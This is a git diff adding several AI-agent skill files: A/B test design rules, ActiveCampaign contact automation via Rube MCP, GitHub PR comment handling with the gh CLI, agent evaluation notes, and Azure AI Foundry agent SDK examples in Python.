|
||||
|
||||
Ensure every A/B test is **valid, rigorous, and safe** before a single line of code is written.
|
||||
|
||||
- Prevents "peeking"
|
||||
- Enforces statistical power
|
||||
- Blocks invalid hypotheses
|
||||
|
||||
---
|
||||
|
||||
## 2️⃣ Pre-Requisites
|
||||
|
||||
You must have:
|
||||
|
||||
- A clear user problem
|
||||
- Access to an analytics source
|
||||
- Roughly estimated traffic volume
|
||||
|
||||
### Hypothesis Quality Checklist
|
||||
|
||||
A valid hypothesis includes:
|
||||
|
||||
- Observation or evidence
|
||||
- Single, specific change
|
||||
- Directional expectation
|
||||
- Defined audience
|
||||
- Measurable success criteria
|
||||
|
||||
---
|
||||
|
||||
### 3️⃣ Hypothesis Lock (Hard Gate)
|
||||
|
||||
Before designing variants or metrics, you MUST:
|
||||
|
||||
- Present the **final hypothesis**
|
||||
- Specify:
|
||||
- Target audience
|
||||
- Primary metric
|
||||
- Expected direction of effect
|
||||
- Minimum Detectable Effect (MDE)
|
||||
|
||||
Ask explicitly:
|
||||
|
||||
> “Is this the final hypothesis we are committing to for this test?”
|
||||
|
||||
**Do NOT proceed until confirmed.**
|
||||
|
||||
---
|
||||
|
||||
### 4️⃣ Assumptions & Validity Check (Mandatory)
|
||||
|
||||
Explicitly list assumptions about:
|
||||
|
||||
- Traffic stability
|
||||
- User independence
|
||||
- Metric reliability
|
||||
- Randomization quality
|
||||
- External factors (seasonality, campaigns, releases)
|
||||
|
||||
If assumptions are weak or violated:
|
||||
|
||||
- Warn the user
|
||||
- Recommend delaying or redesigning the test
|
||||
|
||||
---
|
||||
|
||||
### 5️⃣ Test Type Selection
|
||||
|
||||
Choose the simplest valid test:
|
||||
|
||||
- **A/B Test** – single change, two variants
|
||||
- **A/B/n Test** – multiple variants, higher traffic required
|
||||
- **Multivariate Test (MVT)** – interaction effects, very high traffic
|
||||
- **Split URL Test** – major structural changes
|
||||
|
||||
Default to **A/B** unless there is a clear reason otherwise.
|
||||
|
||||
---
|
||||
|
||||
### 6️⃣ Metrics Definition
|
||||
|
||||
#### Primary Metric (Mandatory)
|
||||
|
||||
- Single metric used to evaluate success
|
||||
- Directly tied to the hypothesis
|
||||
- Pre-defined and frozen before launch
|
||||
|
||||
#### Secondary Metrics
|
||||
|
||||
- Provide context
|
||||
- Explain _why_ results occurred
|
||||
- Must not override the primary metric
|
||||
|
||||
#### Guardrail Metrics
|
||||
|
||||
- Metrics that must not degrade
|
||||
- Used to prevent harmful wins
|
||||
- Trigger test stop if significantly negative
|
||||
|
||||
---
|
||||
|
||||
### 7️⃣ Sample Size & Duration
|
||||
|
||||
Define upfront:
|
||||
|
||||
- Baseline rate
|
||||
- MDE
|
||||
- Significance level (typically 95%)
|
||||
- Statistical power (typically 80%)
|
||||
|
||||
Estimate:
|
||||
|
||||
- Required sample size per variant
|
||||
- Expected test duration
|
||||
|
||||
**Do NOT proceed without a realistic sample size estimate.**
|
||||
|
||||
---
|
||||
|
||||
### 8️⃣ Execution Readiness Gate (Hard Stop)
|
||||
|
||||
You may proceed to implementation **only if all are true**:
|
||||
|
||||
- Hypothesis is locked
|
||||
- Primary metric is frozen
|
||||
- Sample size is calculated
|
||||
- Test duration is defined
|
||||
- Guardrails are set
|
||||
- Tracking is verified
|
||||
|
||||
If any item is missing, stop and resolve it.
|
||||
|
||||
---
|
||||
|
||||
## Running the Test
|
||||
|
||||
### During the Test
|
||||
|
||||
**DO:**
|
||||
|
||||
- Monitor technical health
|
||||
- Document external factors
|
||||
|
||||
**DO NOT:**
|
||||
|
||||
- Stop early due to “good-looking” results
|
||||
- Change variants mid-test
|
||||
- Add new traffic sources
|
||||
- Redefine success criteria
|
||||
|
||||
---
|
||||
|
||||
## Analyzing Results
|
||||
|
||||
### Analysis Discipline
|
||||
|
||||
When interpreting results:
|
||||
|
||||
- Do NOT generalize beyond the tested population
|
||||
- Do NOT claim causality beyond the tested change
|
||||
- Do NOT override guardrail failures
|
||||
- Separate statistical significance from business judgment
|
||||
|
||||
### Interpretation Outcomes
|
||||
|
||||
| Result | Action |
|
||||
| -------------------- | -------------------------------------- |
|
||||
| Significant positive | Consider rollout |
|
||||
| Significant negative | Reject variant, document learning |
|
||||
| Inconclusive | Consider more traffic or bolder change |
|
||||
| Guardrail failure | Do not ship, even if primary wins |
|
||||
|
||||
---
|
||||
|
||||
## Documentation & Learning
|
||||
|
||||
### Test Record (Mandatory)
|
||||
|
||||
Document:
|
||||
|
||||
- Hypothesis
|
||||
- Variants
|
||||
- Metrics
|
||||
- Sample size vs achieved
|
||||
- Results
|
||||
- Decision
|
||||
- Learnings
|
||||
- Follow-up ideas
|
||||
|
||||
Store records in a shared, searchable location to avoid repeated failures.
|
||||
|
||||
---
|
||||
|
||||
## Refusal Conditions (Safety)
|
||||
|
||||
Refuse to proceed if:
|
||||
|
||||
- Baseline rate is unknown and cannot be estimated
|
||||
- Traffic is insufficient to detect the MDE
|
||||
- Primary metric is undefined
|
||||
- Multiple variables are changed without proper design
|
||||
- Hypothesis cannot be clearly stated
|
||||
|
||||
Explain why and recommend next steps.
|
||||
|
||||
---
|
||||
|
||||
## Key Principles (Non-Negotiable)
|
||||
|
||||
- One hypothesis per test
|
||||
- One primary metric
|
||||
- Commit before launch
|
||||
- No peeking
|
||||
- Learning over winning
|
||||
- Statistical rigor first
|
||||
|
||||
---
|
||||
|
||||
## Final Reminder
|
||||
|
||||
A/B testing is not about proving ideas right.
|
||||
It is about **learning the truth with confidence**.
|
||||
|
||||
If you feel tempted to rush, simplify, or “just try it” —
|
||||
that is the signal to **slow down and re-check the design**.
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
213
packages/llm/skills/activecampaign-automation/SKILL.md
Normal file
213
packages/llm/skills/activecampaign-automation/SKILL.md
Normal file
@ -0,0 +1,213 @@
|
||||
---
|
||||
name: activecampaign-automation
|
||||
description: "Automate ActiveCampaign tasks via Rube MCP (Composio): manage contacts, tags, list subscriptions, automation enrollment, and tasks. Always search tools first for current schemas."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# ActiveCampaign Automation via Rube MCP
|
||||
|
||||
Automate ActiveCampaign CRM and marketing automation operations through Composio's ActiveCampaign toolkit via Rube MCP.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Rube MCP must be connected (RUBE_SEARCH_TOOLS available)
|
||||
- Active ActiveCampaign connection via `RUBE_MANAGE_CONNECTIONS` with toolkit `active_campaign`
|
||||
- Always call `RUBE_SEARCH_TOOLS` first to get current tool schemas
|
||||
|
||||
## Setup
|
||||
|
||||
**Get Rube MCP**: Add `https://rube.app/mcp` as an MCP server in your client configuration. No API keys needed — just add the endpoint and it works.
|
||||
|
||||
|
||||
1. Verify Rube MCP is available by confirming `RUBE_SEARCH_TOOLS` responds
|
||||
2. Call `RUBE_MANAGE_CONNECTIONS` with toolkit `active_campaign`
|
||||
3. If connection is not ACTIVE, follow the returned auth link to complete ActiveCampaign authentication
|
||||
4. Confirm connection status shows ACTIVE before running any workflows
|
||||
|
||||
## Core Workflows
|
||||
|
||||
### 1. Create and Find Contacts
|
||||
|
||||
**When to use**: User wants to create new contacts or look up existing ones
|
||||
|
||||
**Tool sequence**:
|
||||
1. `ACTIVE_CAMPAIGN_FIND_CONTACT` - Search for an existing contact [Optional]
|
||||
2. `ACTIVE_CAMPAIGN_CREATE_CONTACT` - Create a new contact [Required]
|
||||
|
||||
**Key parameters for find**:
|
||||
- `email`: Search by email address
|
||||
- `id`: Search by ActiveCampaign contact ID
|
||||
- `phone`: Search by phone number
|
||||
|
||||
**Key parameters for create**:
|
||||
- `email`: Contact email address (required)
|
||||
- `first_name`: Contact first name
|
||||
- `last_name`: Contact last name
|
||||
- `phone`: Contact phone number
|
||||
- `organization_name`: Contact's organization
|
||||
- `job_title`: Contact's job title
|
||||
- `tags`: Comma-separated list of tags to apply
|
||||
|
||||
**Pitfalls**:
|
||||
- `email` is the only required field for contact creation
|
||||
- Phone search uses a general search parameter internally; it may return partial matches
|
||||
- When combining `email` and `phone` in FIND_CONTACT, results are filtered client-side
|
||||
- Tags provided during creation are applied immediately
|
||||
- Creating a contact with an existing email may update the existing contact
|
||||
|
||||
### 2. Manage Contact Tags
|
||||
|
||||
**When to use**: User wants to add or remove tags from contacts
|
||||
|
||||
**Tool sequence**:
|
||||
1. `ACTIVE_CAMPAIGN_FIND_CONTACT` - Find contact by email or ID [Prerequisite]
|
||||
2. `ACTIVE_CAMPAIGN_MANAGE_CONTACT_TAG` - Add or remove tags [Required]
|
||||
|
||||
**Key parameters**:
|
||||
- `action`: 'Add' or 'Remove' (required)
|
||||
- `tags`: Tag names as comma-separated string or array of strings (required)
|
||||
- `contact_id`: Contact ID (provide this or contact_email)
|
||||
- `contact_email`: Contact email address (alternative to contact_id)
|
||||
|
||||
**Pitfalls**:
|
||||
- `action` values are capitalized: 'Add' or 'Remove' (not lowercase)
|
||||
- Tags can be a comma-separated string ('tag1, tag2') or an array (['tag1', 'tag2'])
|
||||
- Either `contact_id` or `contact_email` must be provided; `contact_id` takes precedence
|
||||
- Adding a tag that does not exist creates it automatically
|
||||
- Removing a non-existent tag is a no-op (does not error)
|
||||
|
||||
### 3. Manage List Subscriptions
|
||||
|
||||
**When to use**: User wants to subscribe or unsubscribe contacts from lists
|
||||
|
||||
**Tool sequence**:
|
||||
1. `ACTIVE_CAMPAIGN_FIND_CONTACT` - Find the contact [Prerequisite]
|
||||
2. `ACTIVE_CAMPAIGN_MANAGE_LIST_SUBSCRIPTION` - Subscribe or unsubscribe [Required]
|
||||
|
||||
**Key parameters**:
|
||||
- `action`: 'subscribe' or 'unsubscribe' (required)
|
||||
- `list_id`: Numeric list ID string (required)
|
||||
- `email`: Contact email address (provide this or contact_id)
|
||||
- `contact_id`: Numeric contact ID string (alternative to email)
|
||||
|
||||
**Pitfalls**:
|
||||
- `action` values are lowercase: 'subscribe' or 'unsubscribe'
|
||||
- `list_id` is a numeric string (e.g., '2'), not the list name
|
||||
- List IDs can be retrieved via the GET /api/3/lists endpoint (not available as a Composio tool; use the ActiveCampaign UI)
|
||||
- If both `email` and `contact_id` are provided, `contact_id` takes precedence
|
||||
- Unsubscribing changes status to '2' (unsubscribed) but the relationship record persists
|
||||
|
||||
### 4. Add Contacts to Automations
|
||||
|
||||
**When to use**: User wants to enroll a contact in an automation workflow
|
||||
|
||||
**Tool sequence**:
|
||||
1. `ACTIVE_CAMPAIGN_FIND_CONTACT` - Verify contact exists [Prerequisite]
|
||||
2. `ACTIVE_CAMPAIGN_ADD_CONTACT_TO_AUTOMATION` - Enroll contact in automation [Required]
|
||||
|
||||
**Key parameters**:
|
||||
- `contact_email`: Email of the contact to enroll (required)
|
||||
- `automation_id`: ID of the target automation (required)
|
||||
|
||||
**Pitfalls**:
|
||||
- The contact must already exist in ActiveCampaign
|
||||
- Automations can only be created through the ActiveCampaign UI, not via API
|
||||
- `automation_id` must reference an existing, active automation
|
||||
- The tool performs a two-step process: lookup contact by email, then enroll
|
||||
- Automation IDs can be found in the ActiveCampaign UI or via GET /api/3/automations
|
||||
|
||||
### 5. Create Contact Tasks
|
||||
|
||||
**When to use**: User wants to create follow-up tasks associated with contacts
|
||||
|
||||
**Tool sequence**:
|
||||
1. `ACTIVE_CAMPAIGN_FIND_CONTACT` - Find the contact to associate the task with [Prerequisite]
|
||||
2. `ACTIVE_CAMPAIGN_CREATE_CONTACT_TASK` - Create the task [Required]
|
||||
|
||||
**Key parameters**:
|
||||
- `relid`: Contact ID to associate the task with (required)
|
||||
- `duedate`: Due date in ISO 8601 format with timezone (required, e.g., '2025-01-15T14:30:00-05:00')
|
||||
- `dealTasktype`: Task type ID based on available types (required)
|
||||
- `title`: Task title
|
||||
- `note`: Task description/content
|
||||
- `assignee`: User ID to assign the task to
|
||||
- `edate`: End date in ISO 8601 format (must be later than duedate)
|
||||
- `status`: 0 for incomplete, 1 for complete
|
||||
|
||||
**Pitfalls**:
|
||||
- `duedate` must be a valid ISO 8601 datetime with timezone offset; do NOT use placeholder values
|
||||
- `edate` must be later than `duedate`
|
||||
- `dealTasktype` is a string ID referencing task types configured in ActiveCampaign
|
||||
- `relid` is the numeric contact ID, not the email address
|
||||
- `assignee` is a user ID; resolve user names to IDs via the ActiveCampaign UI
|
||||
|
||||
## Common Patterns
|
||||
|
||||
### Contact Lookup Flow
|
||||
|
||||
```
|
||||
1. Call ACTIVE_CAMPAIGN_FIND_CONTACT with email
|
||||
2. If found, extract contact ID for subsequent operations
|
||||
3. If not found, create contact with ACTIVE_CAMPAIGN_CREATE_CONTACT
|
||||
4. Use contact ID for tags, subscriptions, or automations
|
||||
```
|
||||
|
||||
### Bulk Contact Tagging
|
||||
|
||||
```
|
||||
1. For each contact, call ACTIVE_CAMPAIGN_MANAGE_CONTACT_TAG
|
||||
2. Use contact_email to avoid separate lookup calls
|
||||
3. Batch with reasonable delays to respect rate limits
|
||||
```
|
||||
|
||||
### ID Resolution
|
||||
|
||||
**Contact email -> Contact ID**:
|
||||
```
|
||||
1. Call ACTIVE_CAMPAIGN_FIND_CONTACT with email
|
||||
2. Extract id from the response
|
||||
```
|
||||
|
||||
## Known Pitfalls
|
||||
|
||||
**Action Capitalization**:
|
||||
- Tag actions: 'Add', 'Remove' (capitalized)
|
||||
- Subscription actions: 'subscribe', 'unsubscribe' (lowercase)
|
||||
- Mixing up capitalization causes errors
|
||||
|
||||
**ID Types**:
|
||||
- Contact IDs: numeric strings (e.g., '123')
|
||||
- List IDs: numeric strings
|
||||
- Automation IDs: numeric strings
|
||||
- All IDs should be passed as strings, not integers
|
||||
|
||||
**Automations**:
|
||||
- Automations cannot be created via API; only enrollment is possible
|
||||
- Automation must be active to accept new contacts
|
||||
- Enrolling a contact already in the automation may have no effect
|
||||
|
||||
**Rate Limits**:
|
||||
- ActiveCampaign API has rate limits per account
|
||||
- Implement backoff on 429 responses
|
||||
- Batch operations should be spaced appropriately
|
||||
|
||||
**Response Parsing**:
|
||||
- Response data may be nested under `data` or `data.data`
|
||||
- Parse defensively with fallback patterns
|
||||
- Contact search may return multiple results; match by email for accuracy
|
||||
|
||||
## Quick Reference
|
||||
|
||||
| Task | Tool Slug | Key Params |
|
||||
|------|-----------|------------|
|
||||
| Find contact | ACTIVE_CAMPAIGN_FIND_CONTACT | email, id, phone |
|
||||
| Create contact | ACTIVE_CAMPAIGN_CREATE_CONTACT | email, first_name, last_name, tags |
|
||||
| Add/remove tags | ACTIVE_CAMPAIGN_MANAGE_CONTACT_TAG | action, tags, contact_email |
|
||||
| Subscribe/unsubscribe | ACTIVE_CAMPAIGN_MANAGE_LIST_SUBSCRIPTION | action, list_id, email |
|
||||
| Add to automation | ACTIVE_CAMPAIGN_ADD_CONTACT_TO_AUTOMATION | contact_email, automation_id |
|
||||
| Create task | ACTIVE_CAMPAIGN_CREATE_CONTACT_TASK | relid, duedate, dealTasktype, title |
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
61
packages/llm/skills/address-github-comments/SKILL.md
Normal file
61
packages/llm/skills/address-github-comments/SKILL.md
Normal file
@ -0,0 +1,61 @@
|
||||
---
|
||||
name: address-github-comments
|
||||
description: "Use when you need to address review or issue comments on an open GitHub Pull Request using the gh CLI."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Address GitHub Comments
|
||||
|
||||
## Overview
|
||||
|
||||
Efficiently address PR review comments or issue feedback using the GitHub CLI (`gh`). This skill ensures all feedback is addressed systematically.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
Ensure `gh` is authenticated.
|
||||
|
||||
```bash
|
||||
gh auth status
|
||||
```
|
||||
|
||||
If not logged in, run `gh auth login`.
|
||||
|
||||
## Workflow
|
||||
|
||||
### 1. Inspect Comments
|
||||
|
||||
Fetch the comments for the current branch's PR.
|
||||
|
||||
```bash
|
||||
gh pr view --comments
|
||||
```
|
||||
|
||||
Or use a custom script if available to list threads.
|
||||
|
||||
### 2. Categorize and Plan
|
||||
|
||||
- List the comments and review threads.
|
||||
- Propose a fix for each.
|
||||
- **Wait for user confirmation** on which comments to address first if there are many.
|
||||
|
||||
### 3. Apply Fixes
|
||||
|
||||
Apply the code changes for the selected comments.
|
||||
|
||||
### 4. Respond to Comments
|
||||
|
||||
Once fixed, respond to the threads as resolved.
|
||||
|
||||
```bash
|
||||
gh pr comment <PR_NUMBER> --body "Addressed in latest commit."
|
||||
```
|
||||
|
||||
## Common Mistakes
|
||||
|
||||
- **Applying fixes without understanding context**: Always read the surrounding code of a comment.
|
||||
- **Not verifying auth**: Check `gh auth status` before starting.
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
69
packages/llm/skills/agent-evaluation/SKILL.md
Normal file
69
packages/llm/skills/agent-evaluation/SKILL.md
Normal file
@ -0,0 +1,69 @@
|
||||
---
|
||||
name: agent-evaluation
|
||||
description: "Testing and benchmarking LLM agents including behavioral testing, capability assessment, reliability metrics, and production monitoring\u2014where even top agents achieve less than 50% on re..."
|
||||
risk: unknown
|
||||
source: "vibeship-spawner-skills (Apache 2.0)"
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Agent Evaluation
|
||||
|
||||
You're a quality engineer who has seen agents that aced benchmarks fail spectacularly in
|
||||
production. You've learned that evaluating LLM agents is fundamentally different from
|
||||
testing traditional software—the same input can produce different outputs, and "correct"
|
||||
often has no single answer.
|
||||
|
||||
You've built evaluation frameworks that catch issues before production: behavioral regression
|
||||
tests, capability assessments, and reliability metrics. You understand that the goal isn't
|
||||
100% test pass rate—it
|
||||
|
||||
## Capabilities
|
||||
|
||||
- agent-testing
|
||||
- benchmark-design
|
||||
- capability-assessment
|
||||
- reliability-metrics
|
||||
- regression-testing
|
||||
|
||||
## Requirements
|
||||
|
||||
- testing-fundamentals
|
||||
- llm-fundamentals
|
||||
|
||||
## Patterns
|
||||
|
||||
### Statistical Test Evaluation
|
||||
|
||||
Run tests multiple times and analyze result distributions
|
||||
|
||||
### Behavioral Contract Testing
|
||||
|
||||
Define and test agent behavioral invariants
|
||||
|
||||
### Adversarial Testing
|
||||
|
||||
Actively try to break agent behavior
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Single-Run Testing
|
||||
|
||||
### ❌ Only Happy Path Tests
|
||||
|
||||
### ❌ Output String Matching
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Agent scores well on benchmarks but fails in production | high | // Bridge benchmark and production evaluation |
|
||||
| Same test passes sometimes, fails other times | high | // Handle flaky tests in LLM agent evaluation |
|
||||
| Agent optimized for metric, not actual task | medium | // Multi-dimensional evaluation to prevent gaming |
|
||||
| Test data accidentally used in training or prompts | critical | // Prevent data leakage in agent evaluation |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `multi-agent-orchestration`, `agent-communication`, `autonomous-agents`
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
338
packages/llm/skills/agent-framework-azure-ai-py/SKILL.md
Normal file
338
packages/llm/skills/agent-framework-azure-ai-py/SKILL.md
Normal file
@ -0,0 +1,338 @@
|
||||
---
|
||||
name: agent-framework-azure-ai-py
|
||||
description: "Build Azure AI Foundry agents using the Microsoft Agent Framework Python SDK (agent-framework-azure-ai). Use when creating persistent agents with AzureAIAgentsProvider, using hosted tools (code int..."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Agent Framework Azure Hosted Agents
|
||||
|
||||
Build persistent agents on Azure AI Foundry using the Microsoft Agent Framework Python SDK.
|
||||
|
||||
## Architecture
|
||||
|
||||
```
|
||||
User Query → AzureAIAgentsProvider → Azure AI Agent Service (Persistent)
|
||||
↓
|
||||
Agent.run() / Agent.run_stream()
|
||||
↓
|
||||
Tools: Functions | Hosted (Code/Search/Web) | MCP
|
||||
↓
|
||||
AgentThread (conversation persistence)
|
||||
```
|
||||
|
||||
## Installation
|
||||
|
||||
```bash
|
||||
# Full framework (recommended)
|
||||
pip install agent-framework --pre
|
||||
|
||||
# Or Azure-specific package only
|
||||
pip install agent-framework-azure-ai --pre
|
||||
```
|
||||
|
||||
## Environment Variables
|
||||
|
||||
```bash
|
||||
export AZURE_AI_PROJECT_ENDPOINT="https://<project>.services.ai.azure.com/api/projects/<project-id>"
|
||||
export AZURE_AI_MODEL_DEPLOYMENT_NAME="gpt-4o-mini"
|
||||
export BING_CONNECTION_ID="your-bing-connection-id" # For web search
|
||||
```
|
||||
|
||||
## Authentication
|
||||
|
||||
```python
|
||||
from azure.identity.aio import AzureCliCredential, DefaultAzureCredential
|
||||
|
||||
# Development
|
||||
credential = AzureCliCredential()
|
||||
|
||||
# Production
|
||||
credential = DefaultAzureCredential()
|
||||
```
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Basic Agent
|
||||
|
||||
```python
|
||||
import asyncio
|
||||
from agent_framework.azure import AzureAIAgentsProvider
|
||||
from azure.identity.aio import AzureCliCredential
|
||||
|
||||
async def main():
|
||||
async with (
|
||||
AzureCliCredential() as credential,
|
||||
AzureAIAgentsProvider(credential=credential) as provider,
|
||||
):
|
||||
agent = await provider.create_agent(
|
||||
name="MyAgent",
|
||||
instructions="You are a helpful assistant.",
|
||||
)
|
||||
|
||||
result = await agent.run("Hello!")
|
||||
print(result.text)
|
||||
|
||||
asyncio.run(main())
|
||||
```
|
||||
|
||||
### Agent with Function Tools
|
||||
|
||||
```python
|
||||
from typing import Annotated
|
||||
from pydantic import Field
|
||||
from agent_framework.azure import AzureAIAgentsProvider
|
||||
from azure.identity.aio import AzureCliCredential
|
||||
|
||||
def get_weather(
|
||||
location: Annotated[str, Field(description="City name to get weather for")],
|
||||
) -> str:
|
||||
"""Get the current weather for a location."""
|
||||
return f"Weather in {location}: 72°F, sunny"
|
||||
|
||||
def get_current_time() -> str:
|
||||
"""Get the current UTC time."""
|
||||
from datetime import datetime, timezone
|
||||
return datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
|
||||
|
||||
async def main():
|
||||
async with (
|
||||
AzureCliCredential() as credential,
|
||||
AzureAIAgentsProvider(credential=credential) as provider,
|
||||
):
|
||||
agent = await provider.create_agent(
|
||||
name="WeatherAgent",
|
||||
instructions="You help with weather and time queries.",
|
||||
tools=[get_weather, get_current_time], # Pass functions directly
|
||||
)
|
||||
|
||||
result = await agent.run("What's the weather in Seattle?")
|
||||
print(result.text)
|
||||
```
|
||||
|
||||
### Agent with Hosted Tools
|
||||
|
||||
```python
|
||||
from agent_framework import (
|
||||
HostedCodeInterpreterTool,
|
||||
HostedFileSearchTool,
|
||||
HostedWebSearchTool,
|
||||
)
|
||||
from agent_framework.azure import AzureAIAgentsProvider
|
||||
from azure.identity.aio import AzureCliCredential
|
||||
|
||||
async def main():
|
||||
async with (
|
||||
AzureCliCredential() as credential,
|
||||
AzureAIAgentsProvider(credential=credential) as provider,
|
||||
):
|
||||
agent = await provider.create_agent(
|
||||
name="MultiToolAgent",
|
||||
instructions="You can execute code, search files, and search the web.",
|
||||
tools=[
|
||||
HostedCodeInterpreterTool(),
|
||||
HostedWebSearchTool(name="Bing"),
|
||||
],
|
||||
)
|
||||
|
||||
result = await agent.run("Calculate the factorial of 20 in Python")
|
||||
print(result.text)
|
||||
```
|
||||
|
||||
### Streaming Responses
|
||||
|
||||
```python
|
||||
async def main():
|
||||
async with (
|
||||
AzureCliCredential() as credential,
|
||||
AzureAIAgentsProvider(credential=credential) as provider,
|
||||
):
|
||||
agent = await provider.create_agent(
|
||||
name="StreamingAgent",
|
||||
instructions="You are a helpful assistant.",
|
||||
)
|
||||
|
||||
print("Agent: ", end="", flush=True)
|
||||
async for chunk in agent.run_stream("Tell me a short story"):
|
||||
if chunk.text:
|
||||
print(chunk.text, end="", flush=True)
|
||||
print()
|
||||
```
|
||||
|
||||
### Conversation Threads
|
||||
|
||||
```python
|
||||
from agent_framework.azure import AzureAIAgentsProvider
|
||||
from azure.identity.aio import AzureCliCredential
|
||||
|
||||
async def main():
|
||||
async with (
|
||||
AzureCliCredential() as credential,
|
||||
AzureAIAgentsProvider(credential=credential) as provider,
|
||||
):
|
||||
agent = await provider.create_agent(
|
||||
name="ChatAgent",
|
||||
instructions="You are a helpful assistant.",
|
||||
tools=[get_weather],
|
||||
)
|
||||
|
||||
# Create thread for conversation persistence
|
||||
thread = agent.get_new_thread()
|
||||
|
||||
# First turn
|
||||
result1 = await agent.run("What's the weather in Seattle?", thread=thread)
|
||||
print(f"Agent: {result1.text}")
|
||||
|
||||
# Second turn - context is maintained
|
||||
result2 = await agent.run("What about Portland?", thread=thread)
|
||||
print(f"Agent: {result2.text}")
|
||||
|
||||
# Save thread ID for later resumption
|
||||
print(f"Conversation ID: {thread.conversation_id}")
|
||||
```
|
||||
|
||||
### Structured Outputs
|
||||
|
||||
```python
|
||||
from pydantic import BaseModel, ConfigDict
|
||||
from agent_framework.azure import AzureAIAgentsProvider
|
||||
from azure.identity.aio import AzureCliCredential
|
||||
|
||||
class WeatherResponse(BaseModel):
|
||||
model_config = ConfigDict(extra="forbid")
|
||||
|
||||
location: str
|
||||
temperature: float
|
||||
unit: str
|
||||
conditions: str
|
||||
|
||||
async def main():
|
||||
async with (
|
||||
AzureCliCredential() as credential,
|
||||
AzureAIAgentsProvider(credential=credential) as provider,
|
||||
):
|
||||
agent = await provider.create_agent(
|
||||
name="StructuredAgent",
|
||||
instructions="Provide weather information in structured format.",
|
||||
response_format=WeatherResponse,
|
||||
)
|
||||
|
||||
result = await agent.run("Weather in Seattle?")
|
||||
weather = WeatherResponse.model_validate_json(result.text)
|
||||
print(f"{weather.location}: {weather.temperature}°{weather.unit}")
|
||||
```
|
||||
|
||||
## Provider Methods
|
||||
|
||||
| Method | Description |
|
||||
|--------|-------------|
|
||||
| `create_agent()` | Create new agent on Azure AI service |
|
||||
| `get_agent(agent_id)` | Retrieve existing agent by ID |
|
||||
| `as_agent(sdk_agent)` | Wrap SDK Agent object (no HTTP call) |
|
||||
|
||||
## Hosted Tools Quick Reference
|
||||
|
||||
| Tool | Import | Purpose |
|
||||
|------|--------|---------|
|
||||
| `HostedCodeInterpreterTool` | `from agent_framework import HostedCodeInterpreterTool` | Execute Python code |
|
||||
| `HostedFileSearchTool` | `from agent_framework import HostedFileSearchTool` | Search vector stores |
|
||||
| `HostedWebSearchTool` | `from agent_framework import HostedWebSearchTool` | Bing web search |
|
||||
| `HostedMCPTool` | `from agent_framework import HostedMCPTool` | Service-managed MCP |
|
||||
| `MCPStreamableHTTPTool` | `from agent_framework import MCPStreamableHTTPTool` | Client-managed MCP |
|
||||
|
||||
## Complete Example
|
||||
|
||||
```python
|
||||
import asyncio
|
||||
from typing import Annotated
|
||||
from pydantic import BaseModel, Field
|
||||
from agent_framework import (
|
||||
HostedCodeInterpreterTool,
|
||||
HostedWebSearchTool,
|
||||
MCPStreamableHTTPTool,
|
||||
)
|
||||
from agent_framework.azure import AzureAIAgentsProvider
|
||||
from azure.identity.aio import AzureCliCredential
|
||||
|
||||
|
||||
def get_weather(
|
||||
location: Annotated[str, Field(description="City name")],
|
||||
) -> str:
|
||||
"""Get weather for a location."""
|
||||
return f"Weather in {location}: 72°F, sunny"
|
||||
|
||||
|
||||
class AnalysisResult(BaseModel):
|
||||
summary: str
|
||||
key_findings: list[str]
|
||||
confidence: float
|
||||
|
||||
|
||||
async def main():
|
||||
async with (
|
||||
AzureCliCredential() as credential,
|
||||
MCPStreamableHTTPTool(
|
||||
name="Docs MCP",
|
||||
url="https://learn.microsoft.com/api/mcp",
|
||||
) as mcp_tool,
|
||||
AzureAIAgentsProvider(credential=credential) as provider,
|
||||
):
|
||||
agent = await provider.create_agent(
|
||||
name="ResearchAssistant",
|
||||
instructions="You are a research assistant with multiple capabilities.",
|
||||
tools=[
|
||||
get_weather,
|
||||
HostedCodeInterpreterTool(),
|
||||
HostedWebSearchTool(name="Bing"),
|
||||
mcp_tool,
|
||||
],
|
||||
)
|
||||
|
||||
thread = agent.get_new_thread()
|
||||
|
||||
# Non-streaming
|
||||
result = await agent.run(
|
||||
"Search for Python best practices and summarize",
|
||||
thread=thread,
|
||||
)
|
||||
print(f"Response: {result.text}")
|
||||
|
||||
# Streaming
|
||||
print("\nStreaming: ", end="")
|
||||
async for chunk in agent.run_stream("Continue with examples", thread=thread):
|
||||
if chunk.text:
|
||||
print(chunk.text, end="", flush=True)
|
||||
print()
|
||||
|
||||
# Structured output
|
||||
result = await agent.run(
|
||||
"Analyze findings",
|
||||
thread=thread,
|
||||
response_format=AnalysisResult,
|
||||
)
|
||||
analysis = AnalysisResult.model_validate_json(result.text)
|
||||
print(f"\nConfidence: {analysis.confidence}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
asyncio.run(main())
|
||||
```
|
||||
|
||||
## Conventions
|
||||
|
||||
- Always use async context managers: `async with provider:`
|
||||
- Pass functions directly to `tools=` parameter (auto-converted to AIFunction)
|
||||
- Use `Annotated[type, Field(description=...)]` for function parameters
|
||||
- Use `get_new_thread()` for multi-turn conversations
|
||||
- Prefer `HostedMCPTool` for service-managed MCP, `MCPStreamableHTTPTool` for client-managed
|
||||
|
||||
## Reference Files
|
||||
|
||||
- references/tools.md: Detailed hosted tool patterns
|
||||
- references/mcp.md: MCP integration (hosted + local)
|
||||
- references/threads.md: Thread and conversation management
|
||||
- references/advanced.md: OpenAPI, citations, structured outputs
|
||||
|
||||
## When to Use
|
||||
